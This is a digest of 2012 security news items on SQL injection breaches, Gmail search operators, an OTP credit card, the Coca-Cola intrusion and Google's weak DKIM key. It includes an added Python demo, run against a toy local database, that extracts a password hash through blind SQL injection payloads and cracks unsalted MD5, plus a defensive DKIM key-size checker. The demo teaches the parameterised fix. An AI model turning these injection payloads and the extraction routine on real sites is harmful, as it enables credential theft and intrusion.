Hacker breaches President of Sri Lanka website

The official website of the President of Sri Lanka (president.gov.lk) was breached by a hacker going by the name “Broken-Security”, using a blind SQL injection vulnerability.
The hacker also posted the vulnerability in a Pastebin note, together with a database dump that includes table and column names.
The dump includes the username and encrypted password of the admin account as well, as shown in the screenshot. The hacker didn’t mention any reason for the attack.


Original news article at https://thehackernews.com/ on November 22, 2012 at 10:24PM

Hacker Grabs 150k Adobe User Accounts Via SQL Injection

CowboyRobot writes “Adobe today confirmed that one of its databases has been breached by a hacker and that it had temporarily taken offline the affected Connectusers.com website. The hacker, who also goes by Adam Hima, told Dark Reading that the server he attacked was the Connectusers.com Web server, and that he exploited a SQL injection flaw to execute the attack. ‘It was an SQL Injection vulnerability, somehow I was able to dump the database in less requests than normal people do,’ he says. Users’ passwords for the Adobe Connectusers site were stored and hashed with MD5, he says, which made them ‘easy to crack’ with freely available tools. And Adobe wasn’t using WAFs on the servers, he notes. Tal Beery, a security researcher at Imperva, analyzed the data dump in the Connectusers Pastebin post and found that the list appears to be valid and that the hacked database was relatively old.”
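The two reports above come down to the same pair of weaknesses: SQL assembled from user input (the Sri Lanka site was hit through a blind injection, the Adobe site through a straight dump) and passwords stored as unsalted MD5. The following is an added example, not code from either article or either site. It uses a constructed in-memory SQLite table with a hypothetical `admin` user whose password is `letmein`. `login_vulnerable` builds its query by string formatting, and `blind_extract_hash` pulls the stored hash out through it one character at a time using nothing but the yes/no login result (boolean-based blind injection, with a binary search so each character costs about five requests instead of up to sixteen, which is the kind of trick behind “less requests than normal people do”). `login_safe` is the parameterised form; the same extraction against it returns nothing. `crack_md5` shows why an unsalted MD5 dump is “easy to crack” once it is out.

```python
import hashlib
import sqlite3
from typing import Callable, Optional

HEX = "0123456789abcdef"   # alphabet of an MD5 hex digest, in ASCII order


def make_db() -> sqlite3.Connection:
    """Constructed toy schema: one admin row, password stored as unsalted MD5
    (hypothetical data, nothing here comes from either breached site)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                 ("admin", hashlib.md5(b"letmein").hexdigest()))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # The username is pasted into the SQL text, so a quote in it rewrites the query.
    digest = hashlib.md5(password.encode()).hexdigest()
    sql = f"SELECT 1 FROM users WHERE username = '{username}' AND password = '{digest}'"
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Parameterised: values travel separately from the statement and are never parsed as SQL.
    digest = hashlib.md5(password.encode()).hexdigest()
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, digest)).fetchone() is not None


def blind_extract_hash(login: Callable[[str, str], bool], user: str = "admin",
                       length: int = 32) -> str:
    """Boolean-based blind SQL injection through a login oracle that only answers
    yes/no. Each character is found by binary search over HEX (SQLite compares text
    bytewise, so '>' on single hex characters is well ordered). Returns '' as soon
    as the oracle stops confirming, which is what a parameterised login does."""
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 0, len(HEX) - 1
        while lo < hi:
            mid = (lo + hi) // 2
            payload = f"{user}' AND substr(password,{pos},1) > '{HEX[mid]}' -- "
            if login(payload, "x"):
                lo = mid + 1
            else:
                hi = mid
        # Confirm the candidate so a closed oracle yields '' rather than a run of '0's.
        if not login(f"{user}' AND substr(password,{pos},1) = '{HEX[lo]}' -- ", "x"):
            return recovered
        recovered += HEX[lo]
    return recovered


def crack_md5(digest: str, wordlist) -> Optional[str]:
    # Unsalted, fast hash: one MD5 per guess, so a dictionary attack is cheap.
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


WORDLIST = ["password", "123456", "qwerty", "letmein"]   # constructed sample wordlist


def demo() -> dict:
    conn = make_db()
    leaked = blind_extract_hash(lambda u, p: login_vulnerable(conn, u, p))
    blocked = blind_extract_hash(lambda u, p: login_safe(conn, u, p))
    return {
        "leaked_hash": leaked,                  # 32 hex characters pulled out blind
        "cracked": crack_md5(leaked, WORDLIST) if leaked else None,
        "safe_leak": blocked,                   # '' : the parameterised login gives nothing
    }


if __name__ == "__main__":
    print(demo())
```

Two things to take from running it: the vulnerable login also falls to the plain bypass `admin' -- ` with any password, and the fix is the parameterised statement, not a WAF in front of the broken one. Storing passwords with a slow, salted scheme (bcrypt, scrypt or Argon2) is what would have kept the Adobe dump from being “easy to crack”.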



Original news article at https://slashdot.org/ on November 15, 2012 at 06:03AM

Gmail advanced search parameters

Google’s email service Gmail, or Google Mail, supports a variety of advanced search parameters which have not been documented that well until now. Recently it became known for instance that emails can be filtered by size using the size: parameter in the search form on the Gmail website.

Google today announced that all Gmail advanced search parameters are now listed on a Searching Gmail support page. This includes the size: parameter, but also additional parameters such as older_than: to find emails that are older than a specified age, or larger:, which does the same as size: but accepts unit abbreviations.

Here is a short list of the most important advanced search parameters that you can use to search your emails on the Gmail website:

  • from: – find emails from a specific sender
  • to: – find emails sent to a specific recipient
  • subject: – search for words in subject lines
  • label: – search for messages by label
  • has:attachment – display only messages with attachments
  • filename: – search for attachments by name or filetype
  • in:anywhere – search everywhere, including the spam and trash folders, which are excluded from search results by default.
  • is:starred, is:unread, is:read – search for messages that are starred, unread or read
  • cc:, bcc: – search for recipients listed in cc or bcc fields
  • after:, before:, older:, newer: – search for messages in a specific period of time using the format yyyy/mm/dd
  • is:chat – search for chat messages
  • size: – search for messages larger than a specified size in bytes
  • larger:, smaller: – like size, but may use size abbreviations, e.g. 1MB for 1 million bytes.
  • rfc822msgid: – find messages by message header id


The search parameters are most effective when used in combination with search terms. You can for instance search for emails larger than a specified size sent by a particular contact of yours, or only last year’s emails that you received from a company. Parameters can also be combined, for instance size:10m older_than:3y to find all messages larger than about 10 Megabytes that are more than three years old.

The support page lists additional search parameters and examples for each parameter which demonstrate how a particular parameter can be used in searches on the Gmail site.


Original news article at https://www.ghacks.net on November 15, 2012 at 04:25AM

Filter Gmail email messages by size

If you need to find large attachments on Gmail quickly, you have a few options at your disposal. You can for instance use the Find Big Email service which automatically goes through all of your emails to sort them by size into groups. The program labels the emails accordingly so that you can quickly display all emails with attachments that are over a certain size.

While that is certainly handy, it means that you have to authorize the service for the operation, something that not all Gmail users may want to do considering that emails often contain important data that no one else should have access to.

Back then I explained how you can use a third party email program like Thunderbird to sort emails by size automatically, which is really helpful in this regard. While you need to install and configure the program first, you can display the sizes manually and without third party help.

There is however another option that you can use on Gmail’s website directly. The undocumented parameter size: enables you to display emails that are larger than the specified size. Use that together with a keyword, e.g. work, the name of a contact or an email address, and you have a filtering system that is easy to use and at the same time very efficient.


The size needs to be entered in bytes. A few examples: size:1000000 for messages larger than 1 Megabyte, size:100000 for messages larger than 100 Kilobyte, or size:10000000 for messages larger than 10 Megabyte. This is technically not fully correct, as one Megabyte is 1048576 Bytes, but using the exact value would make things more complicated than they need to be. Just add keywords, email addresses or names to the search phrase to find the emails that you are looking for.

The size parameter can be really useful for a number of operations, for instance to delete large emails to free up space, or to locate a specific email that you know had a large attachment attached to it. (via TechSmog)


Original news article at https://www.ghacks.net on November 09, 2012 at 05:04PM

Singaporeans get hard token baked into credit card

https://regmedia.co.uk/2012/11/07/displaycard.jpg

Two-factor authentication just got a whole lot more convenient for residents of Singapore, after Standard Chartered Bank’s local outfit teamed with MasterCard to offer account-holders a credit card that is also a one-time-password-generating hard token.

MasterCard calls the device a ‘Display Card’ and says it includes “an embedded LCD display and touch-sensitive buttons”.


Original news article at https://news.hitb.org/ on November 08, 2012 at 07:53AM

Coca-Cola Co. Computer Systems Hacked, But Organization Never Publicly Disclosed Loss Of Sensitive Information

FBI officials quietly approached executives at Coca-Cola Co. (KO) on March 15, 2009, with some startling news.

Hackers had broken into the company’s computer systems and were pilfering sensitive files about its attempted $2.4 billion acquisition of China Huiyuan Juice Group (1886), according to three people familiar with the situation and an internal company document detailing the cyber intrusion. The Huiyuan deal, which collapsed three days later, would have been the largest foreign takeover of a Chinese company at the time.



Original news article at https://www.teamshatter.com on November 06, 2012 at 01:53AM

Security Planning Guide for 2013

Our team (specifically Ramon Krikken | Phil Schacter | Eric Maiwald | Dan Blum | Mario de Boer | Anton Chuvakin) has just released an annual security planning guide: “2013 Planning Guide: Security and Risk Management.” Every GTP customer should go and read it! Its abstract states that “The Nexus of Forces brings great opportunities and risks. This Planning Guide provides information security and risk teams with invaluable insights for prioritizing security and risk projects in 2013.”

In the guide, our team tackles the following topics:

Here are a few fun quotes:

  • “Gartner has identified the effects of the Nexus of Forces — information, social, mobile and cloud — as the key macro trends driving IT and information security in 2013.” […] The impetus and nature of these trends are described in more detail in “2013 Professional Effectiveness Planning Guide: Coming to Terms with the Nexus of Forces.”
  • “Building controls that work with a variety of endpoints, cloud services, and hybrid IT means focusing on agile security programs and architecture, which includes monitoring as an important component.” […] “in an increasingly hybrid IT and mobile world, monitoring must see farther beyond the walls, farther above the infrastructure layers and deeper into the application context.”
  • “Other continuing security market drivers are the effects of general volatility on security, a more dangerous threat landscape, complex and evolving regulatory standards of protection, consumerization and mobility, and the ongoing transformative effects of cloud computing.”
  • “Security information and event management (SIEM) solutions are vital as the hub for security monitoring, but other tools such as DLP and database audit and protection (DAP) are needed. Enterprises must prioritize goals and operationalize monitoring to make it effective.”
  • “Implement alert triage and report review processes, and commit people to executing them. Bulk up the gaps with dedicated service providers or tool vendor professional services.”

Finally, I know that some of my esteemed blog readers are upset that I occasionally post links to materials requiring various forms of Gartner subscriptions. Well…mmm…get a subscription already!



Original news article at https://blogs.gartner.com/anton-chuvakin on November 03, 2012 at 12:08AM

How a Google Headhunter’s E-Mail Unraveled a Massive Net Security Hole

Mathematician Zach Harris, 35, of Jupiter, Fl., poses for a portrait on Tuesday. Photo: Brynn Anderson/Wired

It was a strange e-mail, coming from a job recruiter at Google, asking Zachary Harris if he was interested in a position as a site-reliability engineer.

“You obviously have a passion for Linux and programming,” the e-mail from the Google recruiter read. “I wanted to see if you are open to confidentially exploring opportunities with Google?”

Harris was intrigued, but skeptical. The e-mail had come to him last December completely out of the blue, and as a mathematician, he didn’t seem the likeliest candidate for the job Google was pitching.

So he wondered if the e-mail might have been spoofed – something sent from a scammer to appear to come from the search giant. But when Harris examined the e-mail’s header information, it all seemed legitimate.

Then he noticed something strange. Google was using a weak cryptographic key to certify to recipients that its correspondence came from a legitimate Google corporate domain. Anyone who cracked the key could use it to impersonate an e-mail sender from Google, including Google founders Sergey Brin and Larry Page.

The problem lay with the DKIM key (DomainKeys Identified Mail) Google used for its google.com e-mails. DKIM involves a cryptographic key that domains use to sign e-mail originating from them – or passing through them – to validate to a recipient that the domain in the header information on an e-mail is correct and that the correspondence indeed came from the stated domain. When e-mail arrives at its destination, the receiving server can look up the public key through the sender’s DNS records and verify the validity of the signature.

For security reasons, the DKIM standard calls for using keys that are at least 1,024 bits in length. But Google was using a 512-bit key – which could be easily cracked with a little cloud-computing help.
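The check Harris did by hand, reading the key out of DNS and noticing its size, is easy to automate. The following is an added example, not code from the article or from Google; it parses a DKIM TXT record (`v=DKIM1; k=rsa; p=<base64>`), walks the DER SubjectPublicKeyInfo carried in `p=` down to the RSA modulus with a small hand-written DER reader (so it needs no third-party library), and flags anything below RFC 6376’s 1024-bit floor. `make_dkim_record` exists only to build constructed test input: the moduli it is fed are plain odd numbers of the right bit length, not real RSA keys, which is all a size check needs.

```python
import base64

RSA_OID = bytes.fromhex("06092a864886f70d010101")   # OID 1.2.840.113549.1.1.1 rsaEncryption


# --- minimal DER helpers; the encoder half only builds constructed test records ---
def _der_len(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _der_len(len(body)) + body


def _der_int(value: int) -> bytes:
    body = value.to_bytes(max(1, (value.bit_length() + 7) // 8), "big")
    if body[0] & 0x80:                  # DER INTEGER is signed: keep it positive
        body = b"\x00" + body
    return _tlv(0x02, body)


def _read_tlv(buf: bytes, pos: int):
    """Parse one DER TLV at buf[pos]; return (tag, body, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                   # long form: low bits give the length-of-length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def make_dkim_record(modulus: int, exponent: int = 65537) -> str:
    """Constructed helper: wrap (n, e) as an RSA SubjectPublicKeyInfo, the form DKIM's
    p= tag carries. Moduli passed in below are not real RSA keys, just numbers of
    the wanted bit length."""
    rsa_pub = _tlv(0x30, _der_int(modulus) + _der_int(exponent))
    alg = _tlv(0x30, RSA_OID + b"\x05\x00")                  # AlgorithmIdentifier {rsaEncryption, NULL}
    spki = _tlv(0x30, alg + _tlv(0x03, b"\x00" + rsa_pub))   # BIT STRING with 0 unused bits
    return "v=DKIM1; k=rsa; p=" + base64.b64encode(spki).decode()


def rsa_modulus_bits(spki_der: bytes) -> int:
    """Walk SubjectPublicKeyInfo -> BIT STRING -> RSAPublicKey and return the modulus size."""
    tag, spki, _ = _read_tlv(spki_der, 0)
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    _, alg, pos = _read_tlv(spki, 0)
    if not alg.startswith(RSA_OID):
        raise ValueError("not an rsaEncryption key")
    tag, bitstr, _ = _read_tlv(spki, pos)
    if tag != 0x03 or bitstr[0] != 0:
        raise ValueError("malformed BIT STRING")
    _, rsa_pub, _ = _read_tlv(bitstr, 1)                     # skip the unused-bits byte
    tag, n_bytes, _ = _read_tlv(rsa_pub, 0)
    if tag != 0x02:
        raise ValueError("modulus is not an INTEGER")
    return int.from_bytes(n_bytes, "big").bit_length()


def parse_dkim_record(txt: str) -> dict:
    """Split the 'tag=value; tag=value' list of RFC 6376; whitespace inside p= is allowed."""
    tags = {}
    for field in txt.split(";"):
        if "=" in field:
            k, v = field.split("=", 1)
            tags[k.strip()] = "".join(v.split())
    return tags


def check_dkim_key(txt: str, minimum_bits: int = 1024) -> dict:
    """Policy check: RSA modulus at or above minimum_bits (RFC 6376's floor for signers)."""
    tags = parse_dkim_record(txt)
    if tags.get("k", "rsa") != "rsa":
        raise ValueError("only k=rsa records handled here")
    if tags.get("p", "") == "":                               # empty p= means the key is revoked
        return {"bits": 0, "ok": False, "reason": "key revoked (empty p=)"}
    bits = rsa_modulus_bits(base64.b64decode(tags["p"]))
    reason = "" if bits >= minimum_bits else f"{bits}-bit RSA is below the {minimum_bits}-bit floor"
    return {"bits": bits, "ok": bits >= minimum_bits, "reason": reason}


if __name__ == "__main__":
    # Constructed records: a 512-bit key like the one the article describes, and a 2048-bit one.
    for n in ((1 << 511) | 1, (1 << 2047) | 1):
        print(check_dkim_key(make_dkim_record(n)))
```

To run it against a real domain, take the selector from the `s=` tag of a message’s DKIM-Signature header, fetch the record with `dig +short TXT <selector>._domainkey.<domain>`, join the quoted string fragments DNS returns, and pass the result to `check_dkim_key`. The 1024-bit figure is the floor the standard sets for signers; a key that size was acceptable in 2012, but anyone rotating keys today would use 2048 bits, which is where Google landed.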

Harris thought there was no way Google would be so careless, so he concluded it must be a sly recruiting test to see if job applicants would spot the vulnerability. Perhaps the recruiter was in on the game; or perhaps it was set up by Google’s tech team behind the scenes, with recruiters as unwitting accomplices.

Harris wasn’t interested in the job at Google, but he decided to crack the key and send an e-mail to Google founders Brin and Page, as each other, just to show them that he was onto their game.

“I love factoring numbers,” Harris says. “So I thought this was fun. I really wanted to solve their puzzle and prove I could do it.”

In the e-mail, he plugged his personal website:

Hey Larry,

Here’s an interesting idea still being developed in its infancy:

https://www.everythingwiki.net/index.php/What_Zach_wants_regarding_wiki_technology

or, if the above gives you trouble try this instead:

https://everythingwiki.sytes.net/index.php/What_Zach_wants_regarding_wiki_technology.

I think we should look into whether Google could get involved with this guy in some way. What do you think?

-Sergey

Harris made sure the return path for the e-mails went to his own e-mail account, so that Brin and Page could ask him how he’d cracked their puzzle. But Harris never got a response from the Google founders. Instead, two days later, he noticed that Google’s cryptographic key had suddenly changed to 2,048 bits. And he got a lot of sudden hits to his web site from Google IP addresses.

Oops, Harris thought, it was a real vulnerability he’d found.


Original news article at https://www.wired.com/threatlevel on October 24, 2012 at 04:00PM